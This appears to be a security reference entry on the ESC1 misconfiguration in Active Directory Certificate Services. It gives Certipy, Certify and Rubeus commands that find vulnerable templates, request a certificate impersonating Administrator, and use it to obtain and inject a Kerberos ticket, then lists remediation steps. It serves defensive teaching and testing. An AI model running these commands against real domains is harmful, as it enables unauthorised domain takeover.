Active Directory Certificate Services (ESC1)

Description

Active Directory Certificate Services (AD CS) issues X.509 certificates for logon, TLS, and mutual authentication. In the ESC1 misconfiguration, a certificate template has all of the following properties: (a) it includes Client Authentication (and often Smartcard Logon) EKUs; (b) low‑privileged principals can Enroll; and (c) the template allows the enrollee to supply the subject (UPN/SAN). Together these permit an attacker to mint a certificate for any target identity (e.g., Administrator), then authenticate via PKINIT/smartcard logon to obtain Kerberos tickets and persistent access that survives password changes.

Examples

Enumerate Vulnerable Templates

Use Certipy to find misconfigured templates with enrolment permissions and enrollee‑supplied subject:

certipy find -u [email protected] -p 'Passw0rd!' -dc-ip 10.0.0.10 -vulnerable -stdout

Look for templates with ClientAuth EKU and ENROLLEE_SUPPLIES_SUBJECT where “Authenticated Users” can Enroll.

Alternatively, enumerate via Windows tooling:

# Using Certify.exe (SharpADCS)
Certify.exe find /vulnerable

# Using built-in certutil
certutil -template -v | findstr /i "Enrollment Enrollee Supplies Subject Client Authentication SmartcardLogon"

Request a Certificate Impersonating an Admin

Request a certificate for [email protected] using the vulnerable template:

certipy req -u [email protected] -p 'Passw0rd!' -target ca01.corp.local \
  -template VulnerableTemplate -upn [email protected] -debug

Authenticate With the Issued Certificate

Convert and use the certificate to obtain a TGT or logon:

# Kerberos (PKINIT)
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10

This yields a TGT for Administrator, enabling further access.

You can also inject the TGT directly on a domain-joined host with Rubeus:

# Convert PFX to base64 or a .pem/.crt+.key and import as needed
Rubeus asktgt /user:Administrator /certificate:admin.pfx /password:PfxPassword /ptt

Remediation

  1. Harden certificate templates
    • Remove ClientAuth/SmartcardLogon EKUs where not required.
    • Disable ENROLLEE_SUPPLIES_SUBJECT and block SAN/UPN override (disable EDITF_ATTRIBUTESUBJECTALTNAME2).
  2. Restrict enrolment permissions
    • Remove broad groups (e.g., Authenticated Users) from sensitive templates.
    • Delegate enrolment only to dedicated, audited security groups.
  3. Limit impact and monitor
    • Shorten certificate lifetimes; enable revocation and auditing on issuance.
    • Alert on requests where SAN/UPN differs from the requester identity.
  4. Reduce external exposure
    • Disable legacy Web Enrollment on CAs not requiring it; require HTTPS and authentication; prefer offline enrollment flows.